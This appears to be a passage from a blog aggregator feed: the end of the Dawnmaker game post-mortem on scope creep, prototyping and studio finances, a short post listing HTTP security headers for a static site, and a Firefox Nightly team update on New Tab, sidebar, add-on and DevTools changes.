So, we made a fun game. I think we succeeded there by just spending a lot of time in pre-production. Truth be told, we spent about 2 years in that phase, only 6 months in post-production, and we did not really do a real production phase. For 2 years, we were testing the game and making deep changes to its core, iterating until we found the best version of this game we could. Mind you, 2 years was way too long a time, and I'll get back to that in the failures section. But I believe the reason why Dawnmaker was enjoyed by our players is because we took that time to improve it.

Lesson learned

Make good games?

The art of the game was also well received, and here again I think time was the key factor. It took a long time to land on the final art direction. There was a point where the game had a 3D board, and it was… not good. I think one of our major successes, from a production point of view, was to pivot into a 2D board. That simplified a lot of things in terms of programming, of performance, and made us land on that much, much better art style. It took a long time but we got there.

Screenshot of the first prototype of Dawnmaker <figcaption>The first prototype of Dawnmaker, which had sound for some reason…</figcaption>

There's one last aspect that I think mattered in the success of the game, and of which I am particularly proud: the game had very few bugs upon release, and none were blocking. I achieved that by prioritizing bug fixing at all times during the development of the game. I consider that at any point in time, and with very few exceptions, fixing a known bug is higher priority than anything else. Of course this is easier when there is a single programmer who knows the entire code base, but I'm convinced that, if you want to ship bug-free products, bug fixing must not be an afterthought, a thing that you do in post-production. If you keep a bug-free game at all times during development, chances are very high that you'll ship a bug-free game!

Lesson learned

Keeping track of bugs and fixing them as early as possible makes your life easier when you're nearing release, because you don't have to spend time chasing bugs in code that you wrote months or years before. Always reserve time for bug fixing in your planning!

Custom tooling

Speaking of programming, a noticeable part of my time was spent creating a custom tool to handle the game's data. Because we're using a custom tech stack, and not a generic game engine, we did not have access to pre-made tooling. But, since I was in control of the full code of the game, I have been able to create a tool that I'm very happy with.

First a little bit of context: Dawnmaker is coded with Web technologies. What it means is that it's essentially a website, or more specifically, a web app. Dawnmaker runs in a browser. Heck, for most of the development of the game, we did our playtests in browsers! That was super convenient: you want someone to test your game? They can open their favorite browser to the URL of the game, and tada, they can play! No need to download or install anything, no need to worry about updates, they always have the latest version of the game there.

Because our game is web-based, I was able to create a content editor, also web-based, that could run the game. So we have this editor that is a convenient way to edit a database, where all the data about Dawnmaker sits. The cool thing is that, when one of us would make a change to the data, we could click a button right there in the editor, and immediately start playing the game with the changes we just made. No need to download data, build locally, or such cumbersome steps. One click, and you're in the game, with all the debug tools and conveniences you need. Another click, and you're back to the editor, ready to make further changes.

Screenshot of the Dawnmaker content editor <figcaption>Screenshot of the Dawnmaker content editor</figcaption>

That tool evolved over time to also handle the graphical assets related to our buildings. Alexis was able to upload, for each building, its illustration and all the elements composing its tile. I added a spritesheet system that could be used in buildings as animations, with controls to order layers, scale and position elements, and even change the tint of sprites.
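
To make the pattern concrete, here is a minimal sketch of what one record in such an editor-backed database might look like, with invented field names for illustration (Dawnmaker's actual schema isn't public):

    // Hypothetical building record in the shared game database (field names
    // invented for illustration). The editor writes records like this; the
    // game fetches them on startup, so "play with my latest changes" is just
    // a save followed by a page load.
    const building = {
      id: "lumber-mill",
      cost: { eclairium: 2 },
      effects: [{ trigger: "activation", produce: { luminoil: 1 } }],
      // Spritesheet layers composing the tile: ordered, individually scaled
      // and positioned, with an optional tint, as described above.
      layers: [
        { sheet: "tiles.png", frame: "base", order: 0 },
        { sheet: "buildings.png", frame: "mill", order: 1, scale: 0.9, x: 4, y: -2 },
        { sheet: "fx.png", frame: "smoke", order: 2, tint: "#ccccff", fps: 8 },
      ],
    };

    // The game client's side of the loop (hypothetical endpoint):
    async function loadGameData() {
      const res = await fetch("/api/data");
      return res.json();
    }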

Lesson learned

Tooling is an investment that can pay double: it makes you and your team go faster, and can be reused in future projects. Do not make tools for the sake of making tools of course. Do it only when you know that it will save you time in the end. But if you're smart about it, it can really pay off in the long run.

Long-term company strategy

There's one last thing I believe we did well, that I want to discuss, and it's related to our company strategy. Very early on in the creation of Arpentor Studio, we thought about our long-term strategy: what does our road to success look like? Where do we want to be in 5 to 10 years? Our answer was that we wanted to be known for making strategy games (sorry, lots of strategies in this paragraph) that were deep, both in mechanics and meaning. The endgame would be to put ourselves in a position where I could realistically make my dream competitive card game — something akin to Magic: the Gathering, Hearthstone or Legends of Runeterra.

What we did well is that we did not start at the end, but instead drafted a plan to gather experience, knowledge and money, to put ourselves in a place where we would be confident about launching such an ambitious project. We aimed to start by making a solo game, to avoid the huge complexities of handling multiplayer. We aimed to make a simple strategy game, too, but there we missed our goal, for the game we made was way too original and complex. But still, we managed to stay on track: no multiplayer, simple 2D (even though we went 3D for half a year), and mechanics that were not as heavy as they could have been.

We failed on the execution of the plan, and I'll expand on that later in this post, but we did take the time to make a plan and that's a big success in my opinion.

Lesson learned

Keep things as simple as possible for your first games! We humans have a tendency to make things more complex as we go, increasing the scope, adding cool features and so on. That can be a real problem down the line if you're trying to build a sustainable business. Set yourself some hard constraints early on (for example, no 3D, no narration, no NPCs, etc.) and keep to them to make sure you can finish your game in a timely manner.

What we did wrong

It's good to recognize your successes, so that you can repeat them, but it's even more important to take a good look at your failures, so that you can avoid repeating them. We made a lot of mistakes over these past 3 years, both related to Dawnmaker and to Arpentor Studio. I'll start by focusing on the game's production, then move on to the game itself to finally discuss company-related mistakes.

Production mistakes

Scope creep aka "the Nemesis of Game Devs"

The scope of Dawnmaker exploded during its development. We initially wanted to make the game in about a year. We ended up working on it for more than two and a half years instead! There are several reasons why the scope got so out of control.

Screenshot of Dawnmaker, July 2022 <figcaption>Dawnmaker in July 2022 — called "Cities of Heksiga" at the time</figcaption>

The first reason is that we were not strict enough in setting deadlines and respecting them. During our (long) preproduction phase, we would work on an iteration of the game, then test it, then realize that it wasn't as good as we wanted it to be, and thus start another iteration. We did this for… a year and a half? Of course, working on a game instead of smaller prototypes didn't help in reaching the right conclusions faster. But we also failed to make a long-term plan, with hard dates for key milestones of the game's development. We were thinking that it was fine, that the game would be better if we spent more time on it. That is definitely true. What we did not account for was that spending more time would not make it sell significantly better. I'll get back to that when discussing the company strategy.

Lesson learned

Setting deadlines and respecting them is one of the key abilities to master for shipping games and making money with them. Create a budget and assign delivery dates to key milestones. Revisit these often, to make sure you're on track. If not, you need to reassess your situation as soon as possible. Cut the scope of your work or extend your deadlines, but make sure you adapt the budget and that you have a good understanding of the consequences of making those changes.

The second reason the scope exploded is that we were lured into thinking that getting money was easy, especially public funding, and that we should ask for as much money as we could. To do that, we had to increase the scope of what we were presenting, in the hope that we would receive big money, which would enable other sources of money, and allow us to make a bigger game. The problem we faced was that we shifted our actual work to that new plan, that bigger scope, long before we knew if we would get the money or not. And so instead of working on a 1-year production, we insidiously found ourselves working on a 2-to-3-year production. And then of course, we did not get the money we asked for, and were on a track that required a few hundred thousand euros to fund, with just our personal savings to do it.

I think the trick here is to have two different plans for two different games. Their core is the same, but one is the game that you can realistically make without any sort of funding, and the other is what you could do if you were to receive the money. But we should never start working on the "dream" game until the money is in our bank account. I think that's a terribly difficult thing to do — at least it was for me — and a big trap of starting a game production that relies on external funding.

Lesson learned

Never spend money you do not have. Never start down a path until you're sure you will be able to execute it entirely.

The third reason why the scope got out of control is a bit of a consequence of the first two: we saw our game as bigger than it ended up being, and did not focus enough on the strength of our core gameplay. We were convinced that we needed to have a meta-progression, a game outside the game, and struggled a lot to figure out what that should be. And as I discuss in the Game weaknesses section below, I think we failed to do it: our meta-progression is too shallow and doesn't improve the core of the game.

Looking back, I remember conversations we had where we justified the need for this work with the scope of the game, with the price we wanted to sell the game for, and thus with the expectations of our future players. The reasoning was: this is a $20 game, players will expect a lot of replayability, so we need to have a meta-progression that would enable it. I think that was a valid line of thought, if only we were actually making a $20 game. In the end, Dawnmaker was sold for $10. Had we realigned earlier, had we taken a real step back after we realized that we were not getting any significant funding, maybe we would have seen this. For a $10 game, we did not need such a complex meta-progression system. We could have focused more on developing the core of the game, building more content and gameplay systems, and landed on a much simpler progression.

Lesson learned

Things change during the lifetime of a game. Take a step back regularly to ask yourself if the assumptions you made earlier are still valid today.

Prototyping the wrong way

I mentioned earlier that we spent a lot of time in preproduction, working on finding the best version of the core gameplay of our game. I said it was a good thing, but it's also a bad one because it took us way too long to find it. And the reason is simple: we did prototyping wrong.

Screenshot of Dawnmaker, January 2023 <figcaption>Dawnmaker in January 2023</figcaption>

The goal of prototyping is to answer one or a few questions as fast as possible. In order to do that, you need to focus on building just what you need to answer your question, and nothing else. If you start putting actual art in your gameplay prototype, or gameplay in your art prototype, then you're not making a prototype: you're making a game. That's what we did. We started adding art to our gameplay prototype too early. Our first recorded prototype, which we did in Godot, had some art in it. Basic art, sure, but art anyway. The time it took to integrate the art into that prototype is time that was not spent answering the main question the prototype was supposed to answer — at that time: was the core gameplay loop fun?

It might seem inconsequential in a small prototype, but that cost quickly adds up. You're not as agile as you would be if you focused on only one thing. You're solving issues related to your assets instead of focusing on gameplay. And then you're a bit disappointed because it doesn't look too great so you start spending time improving the art. Really quickly you end up building a small game, instead of building a small prototype. Our first prototype even had sound! What the hell? Why did we put sound in a prototype that was crap, and was meant to help us figure out that the gameplay was crap?

Lesson learned

Make your prototypes as small and as focused as possible. Do not mix gameplay and art prototypes. Make sure each prototype answers one question. Prototype as many things as possible before moving on to preproduction.

Not playing to our strengths

I mentioned earlier that we had a 3D board in the game for a few months. Going 3D was a mistake that cost us a lot of time, because I had to program the whole thing, in an environment that had few tools and conveniences — we were not using an engine like Godot or Unity. And I was not good at 3D, I had never worked on a 3D game before, so I had to learn a lot in order to do something functional. The end result was something that worked, but wasn't very pleasant to look at. It had performance issues on my computer, it had bugs that I had no clue how to debug. We ended up ditching the whole 3D board after a lot of discussions and conflicts. The ultimate nail in the coffin came from a publisher who had been shown the game, and who asked: "what is the added value of 3D for this game?" Being unable to give a satisfying answer, we moved back to a 2D board, and were much better for it.

Screenshot of Dawnmaker with a 3D board <figcaption>Dawnmaker in June 2023, with a 3D board</figcaption>

So my question is: why did we go 3D for that period of time? I think there were two reasons working together to send us into that trap. The first one is that we did not assess our strengths and weaknesses enough. Alexis's strength was making 3D art, while I had no experience in implementing 3D in a game, and we knew it, but we did not weigh those enough. The second reason is that we did not know enough about our tools to figure out that we could find a good compromise. See, we thought that we could either go 3D and build everything in 3D, from building models in Blender to integrating them on a 3D board in the game, or we could go 2D, which would simplify my work but would force Alexis to draw sprites by hand.

What we figured out later on was that there were tools that allowed Alexis to work in 3D, creating models and animations in Blender, and export everything for a 2D environment very easily. There was a way to have the best of both worlds, exploiting our strengths without requiring us to learn something new and complex — which we definitely did not want to do for our first commercial game. Our mistake was to not take the time to research that, to find that compromise.

Lesson learned

Research the tools at your disposal, and always look for the most efficient way to do things. Play to the strengths of your team, especially for your first games.

Building a vertical slice instead of a horizontal one

We struggled a lot to figure out what our vertical slice should be. How could we prove that our game was viable to a potential investor? That's what the vertical slice is supposed to do, by providing a "slice" of your game that is representative of the final product you intend to build. It's supposed to have a small subset of your content, like a level, with a very high level of polish. How do you do that for a game that is systemic in nature? How do you build the equivalent of a "level" of a game like Dawnmaker?

We did not find a proper answer to this question. We were constantly juggling priorities between adding systems, because we needed to prove that the game worked and was fun, and adding signs, feedback and juice, because we believed we had to show what the final product would look and feel like. We were basically building the entire game, instead of just a slice of it. This was in part because we had basically no credentials to our name, as Dawnmaker was our first real game, and we feared publishers would have trouble trusting that we would be able to execute the "icing" part of the game. I still think that's a real problem, and the only solution that I see is to not try to go for funding for your first games. But I'll talk more about that in the Company strategy section below.

Screenshot of Dawnmaker, November 2023 <figcaption>Dawnmaker in November 2023</figcaption>

However, I recently came across the concept of horizontal slice, as opposed to the vertical slice, and that blew my mind. The idea is, instead of building a small piece of your game with final quality, to build almost all of the base layers of the game. So, you would build all the systems, a good chunk of the content, everything that is required to show that the gameplay works and is fun. Without working on the game's feel, its signs and feedback, a tutorial, and so on. No icing on the cake, just the meat of it. (Meat in a cake? Yeah, that sounds weird. Or British, I don't know.) The goal of the horizontal slice is to prove that the game as a whole works, that all the systems fit together in harmony, and that the game is fun.

I believe that this is a much better model for a game like Dawnmaker. A game like Mario is fun because it has great controls, pretty assets and funny situations. That's what you prove with a vertical slice. But take a game like Balatro. It is fun because it has reached a balance between all the systems, because it has enough depth to provide a nearly-endless replayability. Controls, feedback and juice are still important of course, but they are not the core of the game, and thus when building such a game, one should not focus on those aspects, but on the systems. We should have done the same with Dawnmaker, and I'll be aiming for a horizontal slice with my next strategy game for sure.

Lesson learned

Different types of games require different processes. Find the process that best serves the development of yours. If you're making some sort of systemic game, maybe building a horizontal slice is a better tool than going for the commonly used vertical slice?

Game weaknesses

Let's now talk about the game itself. Dawnmaker received really good reviews, but I still believe it is lacking in many ways. There are many problems with the gameplay: it lacks some form of adjustable difficulty, to make it a better challenge for a wider range of players. It lacks a more rewarding and engaging meta-progression. And of course it lacks content, as we never actually did our production phase.

Weak meta-progression

As I wrote earlier, I am very happy about the core loop of Dawnmaker. However, I think we failed big with its meta-progression. We decided to make it a roguelike, meaning that there is no progression between runs. You always start a run from the same state. Many players disliked that, and I now understand why, and why roguelites have gained so much popularity.

I recently read an article by Chris Zukowski where he discusses the kind of difficulty that Steam players like. I agree with his analysis and his concept of the "Easy-Hard-Easy (but variable)" difficulty, as I think it's behind a lot of the big successes on Steam these last few years. To summarize (read the article for more details), players like to have an easy micro-loop (the core actions of the game, what you do during one turn), a hard macro-loop (the medium-term goals, in our case, getting enough Eclairium to level up before running out of Luminoil), and on top of that, a meta-progression that they have a lot of control over, and that allows them to adjust the difficulty of the challenge. An example I like a lot is Hades and its Mirror of Night: playing the game is easy, controls are great, but winning a run is very hard. However, by choosing to grind darkness and using it to unlock certain upgrades in the mirror, you get to make the challenge a lot easier. But someone else might decide to not grind darkness, or not spend it, and play with a much greater challenge. The player has a lot of control over the difficulty of the game.

Screenshot of Dawnmaker's world map <figcaption>Dawnmaker's world map</figcaption>

I think this is the biggest miss of Dawnmaker in terms of gameplay. Players cannot adjust the difficulty of the game to their tastes, which has been frustrating for a lot of them. Some complained it was way too hard while others found the game too easy and would have enjoyed more challenge. All of them would have enjoyed the game a lot more had they had a way to control the challenge one way or another. Our mistake was to have some progression inside a run, but not outside. A player can grow stronger during a run, improving their decks or starting resources, but when they lose a run they have to start from scratch again. A player who struggles with the challenge has no way to smooth the difficulty, they have to work and learn how to play better. The "git gud" philosophy might work in some genres, but evidently it didn't fit with the audience of Dawnmaker.

This is not something that would have been easy to add though. I think it's something that needs to be thought about quite early in the process, as it impacts the core gameplay a lot. We tried to add meta-progression to our game too late in the process, and that's a reason we failed: it was too difficult to add good progression without impacting the careful balance of the core gameplay, and having to profoundly rework it.

Lesson learned

Offering an adaptive challenge is important for Steam players, and meta-progression is a good tool to do that. But it needs to be anticipated relatively early, as it is tightly tied to your core gameplay.

Lack of a strong fantasy

I believe the biggest cause for Dawnmaker's financial failure is that it lacks a strong fantasy. That gave us a lot of trouble, mostly in trying to sell the game to players. Presenting it as "city building meets deckbuilding" is not a fantasy, it's a pair of genres. We tried to put forth the "combo" gameplay, explaining that cards and buildings combine to create powerful effects, but as I just wrote, that's gameplay and not a fantasy. Our fantasy was to "bring life back to a dead world", but that's not nearly strong enough: it's neither surprising nor exciting.

Screenshot of Dawnmaker, February 2024 <figcaption>Dawnmaker in February 2024</figcaption>

In hindsight, I believe we missed a huge opportunity in making the zeppelin our main fantasy. It's something that's not often seen in games, it's a great vehicle for the game's ambiance, and I think it would have helped create a better meta-progression. We have an "Airship" view in the game, where players can improve their starting state for the next region they're going to explore, but it's a very basic UI. There was potential to make something more exciting there.

The reason for this failure is that we started this project with mechanics and not with the fantasy. We spent a long time figuring out what our core gameplay would be, testing it until it was fun. And only then did we ask ourselves what the fantasy should be. It turns out that putting a fantasy and a theme on top of gameplay is not easy. I don't mean to say it's impossible, some have successfully done it, but I believe it is much harder than starting with an exciting fantasy and building gameplay on top of it.

Lesson learned

Marketing starts on day 1 of a game's creation. The 2 key elements that sell your game are the genre(s) of the game, and its fantasy or hook. Do not neglect those if you want to make money with your game.

This mistake was in part caused by me being focused primarily on mechanics as a game designer. I often start a project with a gameplay idea, a gimmick or a genre, but rarely with a theme, emotion or fantasy. It's not a problem to start with mechanics, of course. But the fantasy is what sells the game. My goal for my next games, as a designer, is to work on finding a strong fantasy that fits my mechanics much earlier in the process, and build on it instead of trying to shove it into an advanced core loop.

Company strategy

Oooo boy did we make mistakes on a company level. By that I mean, with managing our money. We messed up pretty bad — though seeing stories that pop up regularly on some gamedev subreddits, it could have been way worse. Doesn't mean there aren't lessons to be learned here, so let's dive in!

Hiring too soon, too quick

Managing money is difficult! Or at least, we've not been very good at it. We made the mistake of spending money at the wrong time or for the wrong things several times. That mainly happened because we had too much trust in the future, in the fact that we would find money easily, either by selling our game or by getting public money or investors. While we did get some public funding, it was not nearly enough to cover what we spent, and so Dawnmaker was mostly paid for by our personal savings.

Our biggest misplacement of money was hiring poorly. We made two different mistakes here: on one occasion, we hired someone without properly testing that person and making sure they would fit our team and project. On the other, we hired someone only to realize when they started that we did not have work to give them, because we were way too early in the game's development. Both recruitments ended up costing us a significant amount of money while bringing very little value to the game or the company.

But those failed recruitments had another bad consequence: we hurt people in the process. Our inexperience has been a source of pain for human beings who chose to trust us. That is a terrible feeling for me. I don't know what more to write about this, other than I think I've learned and I hope I won't be hurting others in the future. I'll do my best anyway.

Lesson learned

Hiring is freaking hard. Do not rush it. It's better to not hire than to hire the wrong person.

Too much investment into our first game

I've talked about it already in previous sections, but the biggest strategic mistake on Dawnmaker was to spend so much time on it. Making games is hard, making games that sell is even harder, and there's an incredible amount of luck involved. Of course, the better your game, the higher your chances. But making good games requires experience. Investing 2.5 years into our first commercial game was way too risky: the more time we spent on the game, the more money it needed to bring in, and I don't believe a game's revenue scales with the time invested in it.

Side note: we made a game before Dawnmaker, called Phytomancer — it's available on itch.io for 3€ — but because it had no commercial ambition, I don't think it counts for much in the key areas of making games that sell.

Here are the facts:

Dawnmaker vertical capsule

  • Dawnmaker cost us about 320k€ to make — read my in-depth article about Dawnmaker's real cost for more details — and only made us about 8k€ in net revenue. That is a financial catastrophe, only possible because we invested a lot of our time and personal savings, and we benefited from some French social welfare.
  • Most indie studios close after they release their first game. It's unclear what the exact causes are, but from personal experience, I bet it's in large part because those companies invest too much in their first game and have nothing left when it comes to making the second one — either money or energy. We tend to burn cash and ourselves out.
  • And there's an economic context too: investments in games and game companies have slowed to a trickle over the past couple of years, and they don't seem to be going back up soon. Games are very expensive to make, and the actors that used to pay for their production (publishers, investors) are not playing that role anymore.

Considering this, I strongly believe that today, investing several years into making your first game is not a valid company strategy. It's engaging in an act of faith. And a business should not run on faith. What pains me is that we knew this when we started Arpentor Studio, and we wanted to make Dawnmaker in about a year. But we lacked the discipline to actually keep that deadline, and we lost ourselves in the process. We got heavily side-tracked by thinking we could get some funding, by growing our scope to ask for more money, etc. We didn't start the project with a clear objective, with a strict deadline. So we kept delaying and delaying. We had the comfort of having decent money reserves. We never thought about what would happen after releasing Dawnmaker, never asked ourselves what our situation would be if the game took 3 years to release and didn't make any money. We should have.

Lesson learned

Start by making small games! Learn, experiment, grow, then go for bigger games when you're in a better position to succeed.

Here are my arguments for making several small games instead of investing too much into a single bigger game. Note that these are targeted to folks trying to create a games studio, to make a business of selling games. If your goal is to create your dream game, or if you're in it for the art but don't care about the money, this likely does not apply to you.

  • By releasing more games, you gain a lot of key experience in the business of making games that sell. You receive more player feedback. You have the opportunity to try more things. You learn the tricks of the platform(s) you're selling on — Steam is hard!
  • By releasing more games, you give yourself more chances to break out, to hit that magic moment when a game finds its audience, because it arrives at the right moment, in the right place. (For more on this, I highly recommend this article by Ryan Rigney: Nobody Knows If Your Game Will Pop Off, where the author talks about ways of predicting a hit and the correlation between the number of hits and the number of works produced.)
  • By releasing more games, you build yourself a back catalog. Games sell more on their first day, week or month, for sure, but that doesn't mean they stop selling afterwards. Games on Steam keep generating revenue for a long time, even if a small one. And a small revenue is infinitely better than no revenue at all. And small revenues can pile up to make, who knows, a decent revenue?
  • By releasing more games, you grow your audience. Each game is a way to reach new people and bring them to your following — be it through a newsletter, a discord server or your social networks. The bigger your audience, the higher your chances of selling your next game.
  • By releasing more games, you build your credibility as a game developer. When you go to an investor to show them your incredible new idea, you will make a much better impression if you have already released 5 games on Steam. You prove to them that you know how to finish a game.

Keep in mind that making small games is really, really hard. It requires a lot of discipline and planning. This is where we failed: we wanted to make our game in one year, but never planned that time. We never wrote down what our deadline was, never budgeted that year into milestones. If you want to succeed there, you need to accept that your game will not be perfect, or even good. That's fine. The goal is not to make a great game, it's to release a game. However imperfect that game is, the success criterion is not its quality, or its sales numbers. The number one success criterion is that people can buy it.

<figcaption>Dawnmaker's cinematic release trailer</figcaption>

Conclusion

I wanted to end here, because I think this is the most important thing to learn from this post-mortem. If you're trying to build a sustainable game studio, if you're in it for the long run, then please, please start by making small games. Don't gamble on a crazy-big first game. Garner experience. Learn how the market works. Try things in a way that will cost you as little as possible. Build your audience and your credibility. Then, when the time is right, you'll be much better equipped to take on bigger projects. That doesn't mean you will automatically succeed, but your chances will be much, much higher.

As for myself? Well, I'm trying to learn from my own mistakes. My next project will be a much shorter one, with strict deadlines and milestones. I will capitalize on what I made for Dawnmaker, reusing as much tooling and wisdom as possible, and trying to make the best possible game with the time, money and resources I have. All I can say for now is that it's going to be a deckbuilding strategy game about an alchemist trying to create the Philosopher's Stone. I will talk about it more on my blog and on Arpentor's newsletter, so I hope you'll follow me into that next adventure!

Subscribe to Arpentor Studio's Newsletter! One email about every other month, no spam, with insights on the development of our games and access to early versions of future projects.

Thanks a lot to Elli for their proofreading of this very long post!

Don Martisecurity headers for a static site

This site now has an OPML version (XML) of the blogroll. What can I do with it? It seems like the old Share your OPML site is no more. Any ideas?

Also went through Securing your static website with HTTP response headers by Matt Hobbs and got a clean bill of health from the Security Headers site. Here’s what I have on here as of today:

Access-Control-Allow-Origin "https://blog.zgp.org/"
Cache-Control "max-age=3600"
Content-Security-Policy "base-uri 'self'; default-src 'self'; frame-ancestors 'self';"
Cross-Origin-Opener-Policy "same-origin"
Permissions-Policy "accelerometer=(),autoplay=(),browsing-topics=(),camera=(),display-capture=(),document-domain=(),encrypted-media=(),fullscreen=(),geolocation=(),gyroscope=(),magnetometer=(),microphone=(),midi=(),payment=(),picture-in-picture=(),publickey-credentials-get=(),screen-wake-lock=(),sync-xhr=(self),usb=(),web-share=(),xr-spatial-tracking=()" "expr=%{CONTENT_TYPE} =~ m#text\/(html|javascript)|application\/pdf|xml#i"
Referrer-Policy no-referrer-when-downgrade
Cross-Origin-Resource-Policy same-origin
Cross-Origin-Embedder-Policy require-corp
Strict-Transport-Security "max-age=2592000"
X-Content-Type-Options: nosniff

(update 2 Feb 2025) This site has some pages with inline styles, so I can’t use that CSP line right now.

To allow inline styles:

Content-Security-Policy "base-uri 'self'; default-src 'self'; style-src 'self' 'unsafe-inline'; frame-ancestors 'self';" 

This is because I use the SingleFile extension to make mirrored copies of pages, so I need to move those into their own virtual host so I can go back to using the version without the unsafe-inline.
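
A quick way to double-check what a given page actually serves, as a sketch (assumes Node 18+ with global fetch; run it as an ES module):

    // Fetch one page and print the security headers discussed above.
    const res = await fetch("https://blog.zgp.org/");

    for (const name of [
      "content-security-policy",
      "permissions-policy",
      "referrer-policy",
      "strict-transport-security",
      "x-content-type-options",
    ]) {
      console.log(`${name}: ${res.headers.get(name) ?? "(missing)"}`);
    }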

I saved a copy of Back to the Building Blocks: A Path Toward Secure and Measurable Software (PDF). The original seems to have been taken down, but it’s a US Government document so I can keep a copy on here (like the FBI alert that got taken down last year, which I also have a copy of.)

Bonus links

Why is Big Tech hellbent on making AI opt-out? by Richard Speed. Rather than asking “we’re going to shovel a load of AI services into your apps that you never asked for, but our investors really need you to use. Is this OK?” the assumption instead is that users will be delighted to see their formerly pristine applications cluttered with AI features. Customers, however, seem largely dissatisfied. (IMHO if the EU is really going to throw down and do a software trade war with the USA, this is the best time to switch to European Alternatives. Big-time proprietary software is breaking compatibility while independent alternatives keep on going. People lined up for Microsoft Windows 95 in 1995 and Apple iPhones in 2007, and a trade war with the USA would have been a problem for software users then, but now the EuroStack is a thing. The China stack, too, as Prof. Yu Zhou points out: China tech shrugged off Trump’s ‘trade war’ − there’s no reason it won’t do the same with new tariffs. I updated generative ai antimoats with some recent links. Even if the AI boom does catch on among users, services that use AI are more likely to use predictable independently-hosted models than to rely on Big Tech APIs that can be EOLed or nerfed at any time, or just have the price increased.)

California vs Texas Minimum Wage, 2013-2024 by Barry Ritholtz. [F]or seven years–from January 2013 to March 2020–[California and Texas quick-service restaurant] employment moved almost identically, the correlation between them 0.994. During that seven year period, however, TX had a flat $7.25/hr minimum wage while CA increased its minimum wage by 50%, from $8/hr to $12. Related: Is a Big Mac in Denmark Pricier Than in US?

What’s happening on RedNote? A media scholar explains the app TikTok users are fleeing to – and the cultural moment unfolding there. Jianqing Chen covers the Xiaohongshu boom in the USA. This spontaneous convergence recalls the internet’s original dream of a global village. It’s a glimmer of hope for connection and communication in a divided world. (This is such authentic organic social that the Xiaohongshu ToS hasn’t even been translated into English yet. And not only does nobody read privacy policies (we knew that) but videos about reuniting with your Chinese spy from TikTok are a whole trend on there. One marketing company put up a page of Rules & Community Guidelines translated into English but I haven’t cross-checked it. “Practice the core socialist values.” and “Promote scientific thinking and popularize scientific knowledge.”)

Bob Sullivan reports Facebook acknowledges it’s in a global fight to stop scams, and might not be winning (The bigger global fight they’re in is a labor/management one, and when moderator jobs get less remunerative or more stressful, the users get stuck dealing with more crime.) Related: Meta AI case lawyer quits after Mark Zuckerberg’s ‘Neo-Nazi madness’; Llama depositions unsealed by Amy Castor and David Gerard. (The direct mail/database/surveillance marketing business, get-rich-quick schemes, and various right-wing political movements have been one big overlapping scene in the USA for quite a while, at least back to the Direct Mail and the Rise of the New Right days and possibly further. People in the USA get targeted for a lot of political disinformation and fraud (one scheme can be both), so the Xiaohongshu mod team will be in for a shock as scammers, trolls, and worse will follow the US users onto their platform.)

Firefox NightlyNew Year New Tab – These Weeks in Firefox: Issue 175

Highlights

  • Firefox 134 went out earlier this month!
  • A refreshed New Tab layout is being rolled out to users in the US and Canada, featuring a repositioned logo and weather widget to prioritize Web Search, Shortcuts, and Recommended Stories at the top. The update includes changes to the card UI for recommended stories and allows users with larger screens to see up to four columns, making better use of space.
    • The Firefox New Tab page is shown with the browser logo in the top-left, the weather indicator in the top-right, and 4 columns of stories rather than 3.

      Making better use of the space on the New Tab page!

  • dao enabled the ability to search for closed and saved tab groups (Bug 1936831)
  • kcochrane landed a keyboard shortcut for expanding and collapsing the new sidebar
    • Collapse/Expand sidebar (Ctrl + Alt + Z) – for Linux/Win
    • Collapse/Expand sidebar (⌃Z) – for macOS

Friends of the Firefox team

Resolved bugs (excluding employees)

Script to find new contributors from bug list

Volunteers that fixed more than one bug

  •  Karan Yadav

New contributors (🌟 = first patch)

Project Updates

Add-ons / Web Extensions

Addon Manager & about:addons
  • Fixed about:addons blocklist state message-bars not refreshed when the add-on active state doesn’t change along with the blocklist state (Bug 1936407)
  • Fixed a moz-toggle button related visual regression in about:addons (regression introduced from Bug 1917305 in Nightly 135 and fixed in the same release by Bug 1937627)
  • Adjusted popup notification primary button default string to match the Acorn style guide (Bug 1935726)
WebExtensions Framework
  • Fixed an add-on debugging toolbox regression on resending add-ons network requests from the DevTools Network panel (regression introduced in Nightly 134 from Bug 1754452 and fixed in Nightly 135 by Bug 1934478)
    • Thanks to Alexandre Poirot for fixing this add-on debugging regression
WebExtension APIs
  • Fixed notification API event listeners not restarting suspended extension event pages (Bug 1932263)
  • As part of the work for the MV3 userScripts API (currently locked behind a pref in Nightly 134 and 135):
    • Introduced permission warning in the Firefox Desktop about:addons extensions permissions view (Bug 1931545)
    • Introduced userScripts optional permissions request dialog on Firefox Desktop (Bug 1931548)
    • NOTE: An MV3 userScripts example extension for the MDN webextensions-examples repo is being worked on in the following GitHub pull request: https://github.com/mdn/webextensions-examples/pull/576
    • The permission warning in the Firefox Desktop about:addons extensions permissions view, showing: "Unverified scripts can pose security and privacy risks, such as running harmful code or tracking website activity. Only run scripts from extensions or sources you trust." The WebExtension permission request dialog shown when installing or updating an extension, with the warning: "Unverified scripts can pose security and privacy risks. Only run scripts from extensions or sources you trust."

DevTools

DevTools Toolbox
WebDriver BiDi
  • External:
    • Liam (:ldebeasi) added support for the format argument to the browsingContext.captureScreenshot command. Clients can use it to specify an image format with a type such as “image/jpeg” and a quality ranging between 0 and 1 (#1861737). A sketch of such a command follows this list.
    • Spencer (:speneth) created a helper to check if a browsing context is a top-level browsing context (#1927829)
  • Internal:
    • Sasha landed several fixes to allow saving minidump files easily with geckodriver for both Firefox on desktop and mobile, which will allow crashes to be debugged more efficiently (#1882338, #1859377, #1937790)
    • Henrik enabled the remote.events.async.enabled preference, which means we now process and dispatch action sequences in the parent process (#1922077)
    • Henrik fixed a bug with our AnimationFramePromise which could cause actions to hang if a navigation was triggered (#1937118)
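
As an illustration of the new format argument mentioned above, a client command might look roughly like this (a sketch following the WebDriver BiDi command envelope; the context ID is a placeholder):

{
  "id": 1,
  "method": "browsingContext.captureScreenshot",
  "params": {
    "context": "<browsing-context-id>",
    "format": { "type": "image/jpeg", "quality": 0.8 }
  }
}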

Information Management

  • We’re delaying letting the new sidebar (sidebar.revamp pref) ride the trains while we address findings from user diary studies, experiments and other feedback. Stay tuned!
  • Reworked the vertical tabs mute button (Bug 1921060 – Implement the full mute button spec)
  • We’re focusing on fixing papercuts for the new sidebar and vertical tabs.

Migration Improvements

  • We’ve concluded the experiment that encouraged users to create or sign-in to Mozilla accounts to sync from the AppMenu and FxA toolbar menu. We’re currently analyzing the results.
  • Before the end of 2024, we were able to get some patches into 135 that will let us try some icon variations for the signed-out state for the FxA toolbar menu button. We’ll hopefully be testing those when 135 goes out to release!

Performance Tools (aka Firefox Profiler)

